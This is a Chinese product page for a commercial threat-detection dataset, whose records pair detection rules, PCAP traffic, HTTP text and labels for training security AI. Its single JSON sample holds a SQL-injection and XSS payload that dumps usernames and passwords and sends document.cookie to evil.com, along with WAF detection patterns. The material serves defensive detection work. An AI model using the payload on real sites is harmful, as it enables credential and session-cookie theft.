数据集概览
定义:综合威胁检测规则数据集是由长沙朗慧信息科技有限公司安全实验室构建的大规模多类型威胁检测数据集。每条数据以「XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案」五元组关联结构组织,覆盖Web攻击(SQLi/XSS/RCE/LFI/SSRF)、网络攻击(DDoS/扫描/C2)、主机攻击(提权/持久化)、云安全攻击、API攻击、0day/NDay漏洞利用共六大威胁类别,提供完整ATT&CK框架映射(覆盖14个战术),专为安全大模型综合预训练和多威胁检测基座模型训练设计。
| 数据集名称 | 综合威胁检测规则数据集 |
| 数据总量 | 2,000~50,000条 |
| 数据类型 | 五元组:XML规则 + PCAP流量 + HTTP还原文本 + 攻击类型标签 + 标准答案 |
| 数据来源 | 朗慧安全实验室 + 多源威胁情报(OTX/AlienVault/MISP)+ 漏洞平台 |
| 授权方式 | 商业授权 附带完整授权文件 |
| 交付周期 | 4-6周 |
| 威胁类别 | Web攻击(SQLi/XSS/RCE/LFI/SSRF/文件上传/XXE)、网络攻击(DDoS/端口扫描/C2通信/DNS隧道)、主机攻击(权限提升/持久化/凭证窃取/横向移动)、云安全攻击(S3遍历/IMDSv1利用/IAM提权)、API攻击(GraphQL注入/REST API滥用/JWT攻击)、0day/NDay漏洞利用 |
| ATT&CK映射 | 完整14个战术映射:Reconnaissance、Resource Development、Initial Access、Execution、Persistence、Privilege Escalation、Defense Evasion、Credential Access、Discovery、Lateral Movement、Collection、C2、Exfiltration、Impact |
| 输出格式 | JSONL / CSV / Excel / PCAP |
| 语言 | 中英双语 |
核心数据字段
每条数据包含规则标识、XML检测规则、攻击载荷、HTTP还原文本、PCAP流量及标准答案六大类别,覆盖从规则定义到验证评估的完整闭环。
| 字段类别 | 字段数 | 典型字段 |
|---|---|---|
| 规则标识 | 4 | rule_id(规则唯一ID)、rule_name(规则名称)、threat_category(威胁大类)、severity(严重级别:Critical/High/Medium/Low) |
| XML检测规则 | 3 | rule_xml(Snort/Suricata/ModSecurity格式XML规则)、rule_signature(规则特征签名)、rule_platform(适用平台:NIDS/WAF/HIDS) |
| 攻击载荷 | 4 | payload(攻击Payload原文)、threat_category(威胁分类标签)、threat_level(威胁等级1-5)、encoding_type(编码方式) |
| HTTP还原文本 | 3 | http_request(HTTP请求全文)、http_response(HTTP响应全文)、protocol_info(协议信息:HTTP/1.1/HTTP2/gRPC) |
| PCAP流量 | 4 | pcap_file(PCAP文件名)、pcap_size(文件大小)、packet_count(数据包数量)、flow_duration(流持续时间) |
| 标准答案 | 5 | is_attack(是否为攻击:true/false)、attack_type(攻击具体类型)、kill_chain_phase(杀伤链阶段:Delivery/Exploitation/Installation/C2/Actions)、technique_ids(关联ATT&CK技术ID列表)、impact_score(影响评分1-10) |
| 威胁情报关联 | 3 | cve_ref(关联CVE编号)、mitre_group(关联APT组织)、campaign(关联攻击活动/战役名称) |
数据样例展示
以下为脱敏后的结构化 JSON 样例,展示SQL注入五元组检测数据的典型格式。
{
"entry_id": "THREAT-2024-012834",
"rule_id": "THREAT-WEB-0452",
"rule_name": "Combined SQLi + XSS Attack via Search Endpoint",
"threat_category": "Web Attack (SQLi + XSS)",
"severity": "Critical",
"rule_xml": "<rule id=\"1000001\" phase=\"2\">\n <operator>multiDetect</operator>\n <action>block</action>\n <pattern_sqli>union\\s+(?:all\\s+)?select</pattern_sqli>\n <pattern_xss><script.*?></pattern_xss>\n <target>ARGS|REQUEST_BODY</target>\n</rule>",
"payload": "1' UNION SELECT NULL,username,password FROM users-- <script>new Image().src='http://evil.com/steal?c='+document.cookie</script>",
"threat_category": "Web Attack",
"threat_level": 5,
"encoding_type": "Mixed (SQLi: URL-encoded, XSS: plaintext)",
"http_request": "GET /search.php?q=1'%20UNION%20SELECT...<script>... HTTP/1.1\r\nHost: target-web.com\r\nCookie: PHPSESSID=abc123\r\n\r\n",
"http_response": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>...admin:$2a$10$hash...<script>new Image().src=...</script>...</html>",
"pcap_file": "threat_web_combined_sqli_xss.pcap",
"pcap_size": "24532",
"packet_count": 78,
"technique_ids": ["T1190","T1059.004","T1189"],
"kill_chain_phase": "Exploitation",
"impact_score": 9.5,
"mitre_group": "APT41",
"cve_ref": "N/A",
"answer": {
"is_attack": true,
"attack_type": "Combined SQLi + Reflected XSS",
"kill_chain_phase": "Exploitation",
"impact_score": 9.5
}
}AI 应用场景
安全大模型综合预训练
50,000条多类型威胁五元组数据,覆盖Web/网络/主机/云/API/0day六大类别,是安全大模型(Security LLM)预训练的完整语料基础。
多威胁检测基座模型
从SQL注入到APT攻击,跨类别威胁数据训练统一的多威胁检测基座模型,实现One Model for All Threats的通用安全AI架构。
安全运营中心(SOC)AI
完整ATT&CK映射+杀伤链阶段标注,训练SOC AI分析师自动完成:告警研判→威胁分类→攻击链还原→响应建议全流程自动化。
XDR自动化响应
跨Web/网络/主机/云的多维度威胁数据,训练XDR AI引擎实现跨域关联分析、攻击路径还原和自动化响应编排。
威胁狩猎(Threat Hunting)AI
基于MITRE ATT&CK技术映射和APT组织关联数据,训练威胁狩猎AI主动搜索潜在威胁,识别隐藏的攻击行为模式。
安全态势感知
多类型威胁数据+威胁等级+影响评分,训练安全态势感知AI实时评估企业整体安全态势,生成动态风险评分和预测性告警。